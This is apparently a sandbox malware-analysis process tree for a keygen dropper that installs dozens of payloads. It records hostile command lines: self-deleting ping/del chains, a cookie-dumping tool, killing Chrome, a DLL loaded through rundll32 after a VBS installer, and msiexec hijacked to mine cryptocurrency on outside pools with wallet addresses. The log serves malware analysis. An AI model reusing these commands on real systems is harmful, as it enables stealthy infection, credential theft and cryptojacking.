C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:3076 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:4040
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3912 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3304 -
C:\Users\Admin\AppData\Local\Temp\8KP9TIY12K\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\8KP9TIY12K\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:432 -
C:\Users\Admin\AppData\Local\Temp\8KP9TIY12K\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\8KP9TIY12K\multitimer.exe" 1 3.1617560654.606a044e8b5d6 1016⤵PID:4412
-
C:\Users\Admin\AppData\Local\Temp\8KP9TIY12K\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\8KP9TIY12K\multitimer.exe" 2 3.1617560654.606a044e8b5d67⤵PID:4624
-
C:\Users\Admin\AppData\Local\Temp\wb3xdbkigpp\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\wb3xdbkigpp\Setup3310.exe" /Verysilent /subid=5778⤵PID:4744
-
C:\Users\Admin\AppData\Local\Temp\is-NB4D5.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-NB4D5.tmp\Setup3310.tmp" /SL5="$302F8,138429,56832,C:\Users\Admin\AppData\Local\Temp\wb3xdbkigpp\Setup3310.exe" /Verysilent /subid=5779⤵PID:4712
-
C:\Users\Admin\AppData\Local\Temp\is-TIEN5.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-TIEN5.tmp\Setup.exe" /Verysilent10⤵PID:6120
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"11⤵PID:4112
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:5080
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:5048
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"11⤵PID:696
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 696 -s 94812⤵
- Program crash
PID:5156
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 696 -s 100412⤵
- Program crash
PID:7396
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 696 -s 102012⤵
- Program crash
PID:6712
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 696 -s 115212⤵
- Program crash
PID:6860
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 696 -s 118812⤵
- Program crash
PID:6364
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 696 -s 124412⤵
- Program crash
PID:7444
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 696 -s 152012⤵
- Program crash
PID:4296
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 696 -s 159612⤵
- Program crash
PID:5472
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 696 -s 152012⤵
- Program crash
PID:212
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 696 -s 154012⤵
- Program crash
PID:7312
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 696 -s 164012⤵
- Program crash
PID:6788
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 696 -s 193612⤵
- Program crash
PID:4644
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 696 -s 191612⤵
- Program crash
PID:4424
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"11⤵PID:6064
-
C:\Users\Admin\AppData\Local\Temp\is-PA4CE.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-PA4CE.tmp\LabPicV3.tmp" /SL5="$20476,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"12⤵PID:6056
-
C:\Users\Admin\AppData\Local\Temp\is-K0SJI.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-K0SJI.tmp\ppppppfy.exe" /S /UID=lab21413⤵PID:4728
-
C:\Program Files\Windows NT\IAOZVNWCVK\prolab.exe"C:\Program Files\Windows NT\IAOZVNWCVK\prolab.exe" /VERYSILENT14⤵PID:5092
-
C:\Users\Admin\AppData\Local\Temp\is-N01LT.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-N01LT.tmp\prolab.tmp" /SL5="$A006A,575243,216576,C:\Program Files\Windows NT\IAOZVNWCVK\prolab.exe" /VERYSILENT15⤵PID:3332
-
-
-
C:\Users\Admin\AppData\Local\Temp\9a-d8efa-8f2-bd49c-b9ca16a4f1764\Tixurevyhu.exe"C:\Users\Admin\AppData\Local\Temp\9a-d8efa-8f2-bd49c-b9ca16a4f1764\Tixurevyhu.exe"14⤵PID:4192
-
-
C:\Users\Admin\AppData\Local\Temp\7f-1b458-159-e58a6-c6656062a117b\Wysaedobati.exe"C:\Users\Admin\AppData\Local\Temp\7f-1b458-159-e58a6-c6656062a117b\Wysaedobati.exe"14⤵PID:5852
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ujvisuco.kga\md6_6ydj.exe & exit15⤵PID:7472
-
C:\Users\Admin\AppData\Local\Temp\ujvisuco.kga\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\ujvisuco.kga\md6_6ydj.exe16⤵PID:7848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\os1bcffz.3si\askinstall31.exe & exit15⤵PID:7908
-
C:\Users\Admin\AppData\Local\Temp\os1bcffz.3si\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\os1bcffz.3si\askinstall31.exe16⤵PID:8180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l2ncupzo.wca\toolspab1.exe & exit15⤵PID:7332
-
C:\Users\Admin\AppData\Local\Temp\l2ncupzo.wca\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\l2ncupzo.wca\toolspab1.exe16⤵PID:6752
-
C:\Users\Admin\AppData\Local\Temp\l2ncupzo.wca\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\l2ncupzo.wca\toolspab1.exe17⤵PID:6580
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\euickmkn.urc\GcleanerWW.exe /mixone & exit15⤵PID:7172
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"11⤵PID:2776
-
C:\Users\Admin\AppData\Local\Temp\is-Q60CL.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-Q60CL.tmp\lylal220.tmp" /SL5="$20474,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"12⤵PID:4588
-
C:\Users\Admin\AppData\Local\Temp\is-AGVP4.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-AGVP4.tmp\Microsoft.exe" /S /UID=lylal22013⤵PID:5480
-
C:\Program Files\7-Zip\JZXQDKAWGR\irecord.exe"C:\Program Files\7-Zip\JZXQDKAWGR\irecord.exe" /VERYSILENT14⤵PID:3308
-
C:\Users\Admin\AppData\Local\Temp\is-1J4OS.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-1J4OS.tmp\irecord.tmp" /SL5="$4044E,6265333,408064,C:\Program Files\7-Zip\JZXQDKAWGR\irecord.exe" /VERYSILENT15⤵PID:4648
-
-
-
C:\Users\Admin\AppData\Local\Temp\f2-8272d-ad1-c7490-bd3a08496f78e\ZHeqagokysae.exe"C:\Users\Admin\AppData\Local\Temp\f2-8272d-ad1-c7490-bd3a08496f78e\ZHeqagokysae.exe"14⤵PID:4256
-
-
C:\Users\Admin\AppData\Local\Temp\a1-424b4-67f-ee887-ed25fbe3d0b8d\Hytutecylo.exe"C:\Users\Admin\AppData\Local\Temp\a1-424b4-67f-ee887-ed25fbe3d0b8d\Hytutecylo.exe"14⤵PID:5444
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\m4oupkr1.esp\md6_6ydj.exe & exit15⤵PID:7148
-
C:\Users\Admin\AppData\Local\Temp\m4oupkr1.esp\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\m4oupkr1.esp\md6_6ydj.exe16⤵PID:7520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zpif0dxr.hhu\askinstall31.exe & exit15⤵PID:7536
-
C:\Users\Admin\AppData\Local\Temp\zpif0dxr.hhu\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\zpif0dxr.hhu\askinstall31.exe16⤵PID:7972
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe17⤵PID:6476
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe18⤵
- Kills process with taskkill
PID:6784
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xo22mph0.dlr\toolspab1.exe & exit15⤵PID:8120
-
C:\Users\Admin\AppData\Local\Temp\xo22mph0.dlr\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\xo22mph0.dlr\toolspab1.exe16⤵PID:2624
-
C:\Users\Admin\AppData\Local\Temp\xo22mph0.dlr\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\xo22mph0.dlr\toolspab1.exe17⤵PID:4632
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g2wgcb0z.udw\GcleanerWW.exe /mixone & exit15⤵PID:6180
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"11⤵PID:4544
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"12⤵PID:4336
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install13⤵PID:5844
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"11⤵PID:4604
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"12⤵PID:4260
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install13⤵PID:3964
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"11⤵PID:5288
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\0Jm5LQEyZe9W.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\0Jm5LQEyZe9W.exe"11⤵PID:4552
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:3556
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"11⤵PID:4760
-
C:\Users\Admin\AppData\Local\Temp\FB2LZMFO7H\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\FB2LZMFO7H\multitimer.exe" 0 306065bb10421b26.04333812 0 10312⤵PID:5636
-
C:\Users\Admin\AppData\Local\Temp\FB2LZMFO7H\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\FB2LZMFO7H\multitimer.exe" 1 3.1617560752.606a04b01e5bb 10313⤵PID:4164
-
C:\Users\Admin\AppData\Local\Temp\FB2LZMFO7H\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\FB2LZMFO7H\multitimer.exe" 2 3.1617560752.606a04b01e5bb14⤵PID:5184
-
C:\Users\Admin\AppData\Local\Temp\efimvz5icgi\app.exe"C:\Users\Admin\AppData\Local\Temp\efimvz5icgi\app.exe" /8-2315⤵PID:6888
-
C:\Users\Admin\AppData\Local\Temp\efimvz5icgi\app.exe"C:\Users\Admin\AppData\Local\Temp\efimvz5icgi\app.exe" /8-2316⤵PID:7836
-
-
-
C:\Users\Admin\AppData\Local\Temp\2ragbe0d5lr\msqhdqoejoq.exe"C:\Users\Admin\AppData\Local\Temp\2ragbe0d5lr\msqhdqoejoq.exe" /ustwo INSTALL15⤵PID:6868
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "msqhdqoejoq.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\2ragbe0d5lr\msqhdqoejoq.exe" & exit16⤵PID:6936
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "msqhdqoejoq.exe" /f17⤵
- Kills process with taskkill
PID:6928
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\wfxeddi42da\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\wfxeddi42da\Setup3310.exe" /Verysilent /subid=57715⤵PID:6920
-
C:\Users\Admin\AppData\Local\Temp\is-VPBS5.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-VPBS5.tmp\Setup3310.tmp" /SL5="$50298,138429,56832,C:\Users\Admin\AppData\Local\Temp\wfxeddi42da\Setup3310.exe" /Verysilent /subid=57716⤵PID:7004
-
C:\Users\Admin\AppData\Local\Temp\is-GSBON.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-GSBON.tmp\Setup.exe" /Verysilent17⤵PID:8136
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\wfkzz4uty2y\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\wfkzz4uty2y\cpyrix.exe" /VERYSILENT15⤵PID:7028
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe16⤵PID:7732
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"17⤵PID:4436
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe16⤵PID:7968
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"17⤵PID:6396
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\hhwapz4map2\vict.exe"C:\Users\Admin\AppData\Local\Temp\hhwapz4map2\vict.exe" /VERYSILENT /id=53515⤵PID:7052
-
C:\Users\Admin\AppData\Local\Temp\is-EESRD.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-EESRD.tmp\vict.tmp" /SL5="$4026E,870426,780800,C:\Users\Admin\AppData\Local\Temp\hhwapz4map2\vict.exe" /VERYSILENT /id=53516⤵PID:6496
-
C:\Users\Admin\AppData\Local\Temp\is-UEI7J.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-UEI7J.tmp\win1host.exe" 53517⤵PID:4004
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\xr2rko4qt1q\vpn.exe"C:\Users\Admin\AppData\Local\Temp\xr2rko4qt1q\vpn.exe" /silent /subid=48215⤵PID:7128
-
C:\Users\Admin\AppData\Local\Temp\is-BELDA.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-BELDA.tmp\vpn.tmp" /SL5="$502F8,15170975,270336,C:\Users\Admin\AppData\Local\Temp\xr2rko4qt1q\vpn.exe" /silent /subid=48216⤵PID:6676
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Z9PSCZJ7NC\setups.exe"C:\Users\Admin\AppData\Local\Temp\Z9PSCZJ7NC\setups.exe" ll12⤵PID:4476
-
C:\Users\Admin\AppData\Local\Temp\is-VS6I8.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-VS6I8.tmp\setups.tmp" /SL5="$40434,454998,229376,C:\Users\Admin\AppData\Local\Temp\Z9PSCZJ7NC\setups.exe" ll13⤵PID:5204
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"11⤵PID:216
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fos0bxmpzo4\014s5pvgsbu.exe"C:\Users\Admin\AppData\Local\Temp\fos0bxmpzo4\014s5pvgsbu.exe" /VERYSILENT8⤵PID:4536
-
C:\Users\Admin\AppData\Local\Temp\is-V0LVN.tmp\014s5pvgsbu.tmp"C:\Users\Admin\AppData\Local\Temp\is-V0LVN.tmp\014s5pvgsbu.tmp" /SL5="$2030C,2592217,780800,C:\Users\Admin\AppData\Local\Temp\fos0bxmpzo4\014s5pvgsbu.exe" /VERYSILENT9⤵PID:4340
-
C:\Users\Admin\AppData\Local\Temp\is-M7BJ1.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-M7BJ1.tmp\winlthsth.exe"10⤵PID:5336
-
C:\Users\Admin\AppData\Local\Temp\CA4JHFxBd.exe"C:\Users\Admin\AppData\Local\Temp\CA4JHFxBd.exe"11⤵PID:2568
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"12⤵PID:8188
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Marito.gif12⤵PID:6876
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe13⤵PID:7176
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\p5tylza12of\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\p5tylza12of\cpyrix.exe" /VERYSILENT8⤵PID:5052
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe9⤵PID:5848
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"10⤵PID:660
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe9⤵PID:5972
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"10⤵PID:5500
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\dsftnm3q5as\zblbhcehnip.exe"C:\Users\Admin\AppData\Local\Temp\dsftnm3q5as\zblbhcehnip.exe" /ustwo INSTALL8⤵PID:4400
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "zblbhcehnip.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\dsftnm3q5as\zblbhcehnip.exe" & exit9⤵PID:4468
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "zblbhcehnip.exe" /f10⤵
- Kills process with taskkill
PID:4696
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ecgo1pxn5lo\vict.exe"C:\Users\Admin\AppData\Local\Temp\ecgo1pxn5lo\vict.exe" /VERYSILENT /id=5358⤵PID:4448
-
C:\Users\Admin\AppData\Local\Temp\is-H59IN.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-H59IN.tmp\vict.tmp" /SL5="$20370,870426,780800,C:\Users\Admin\AppData\Local\Temp\ecgo1pxn5lo\vict.exe" /VERYSILENT /id=5359⤵PID:5412
-
C:\Users\Admin\AppData\Local\Temp\is-V0113.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-V0113.tmp\win1host.exe" 53510⤵PID:5816
-
C:\Users\Admin\AppData\Local\Temp\JoZNSlEPU.exe"C:\Users\Admin\AppData\Local\Temp\JoZNSlEPU.exe"11⤵PID:5432
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"12⤵PID:6684
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Marito.gif12⤵PID:5588
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe13⤵PID:6236
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\xv4l5lircx3\daugip3p1zl.exe"C:\Users\Admin\AppData\Local\Temp\xv4l5lircx3\daugip3p1zl.exe"8⤵PID:5172
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\xv4l5lircx3\daugip3p1zl.exe"9⤵PID:6136
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
PID:5448
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\xdcagz2jpjc\zlcfqxpdneo.exe"C:\Users\Admin\AppData\Local\Temp\xdcagz2jpjc\zlcfqxpdneo.exe" /quiet SILENT=1 AF=7568⤵PID:5220
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\xdcagz2jpjc\zlcfqxpdneo.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\xdcagz2jpjc\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617301089 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:5304
-
-
-
C:\Users\Admin\AppData\Local\Temp\e1vzb00virv\app.exe"C:\Users\Admin\AppData\Local\Temp\e1vzb00virv\app.exe" /8-238⤵PID:5260
-
C:\Users\Admin\AppData\Local\Temp\e1vzb00virv\app.exe"C:\Users\Admin\AppData\Local\Temp\e1vzb00virv\app.exe" /8-239⤵PID:5748
-
-
-
C:\Users\Admin\AppData\Local\Temp\hitfivg1xcj\vpn.exe"C:\Users\Admin\AppData\Local\Temp\hitfivg1xcj\vpn.exe" /silent /subid=4828⤵PID:5388
-
C:\Users\Admin\AppData\Local\Temp\is-QTO9P.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-QTO9P.tmp\vpn.tmp" /SL5="$10436,15170975,270336,C:\Users\Admin\AppData\Local\Temp\hitfivg1xcj\vpn.exe" /silent /subid=4829⤵PID:5544
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵PID:5872
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵PID:6040
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵PID:4748
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵PID:2696
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵PID:4548
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵PID:7188
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\t30p0pu3pd5\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\t30p0pu3pd5\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:5148
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\67NFV24GHS\setups.exe"C:\Users\Admin\AppData\Local\Temp\67NFV24GHS\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1372 -
C:\Users\Admin\AppData\Local\Temp\is-N6RAA.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-N6RAA.tmp\setups.tmp" /SL5="$40190,454998,229376,C:\Users\Admin\AppData\Local\Temp\67NFV24GHS\setups.exe" ll6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1276
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:188 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:1016 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2688
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full_Version.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full_Version.exe"4⤵PID:4328
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵PID:4496
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵PID:4700
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"4⤵PID:4532
-
C:\Users\Admin\AppData\Roaming\6850.tmp.exe"C:\Users\Admin\AppData\Roaming\6850.tmp.exe"5⤵PID:1348
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w4674 --cpu-max-threads-hint 50 -r 99996⤵PID:4944
-
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w2403@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:1832
-
-
-
C:\Users\Admin\AppData\Roaming\6A16.tmp.exe"C:\Users\Admin\AppData\Roaming\6A16.tmp.exe"5⤵PID:4348
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\6A16.tmp.exe6⤵PID:4608
-
C:\Windows\SysWOW64\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:5384
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"5⤵PID:4512
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:4704
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"4⤵PID:4816
-
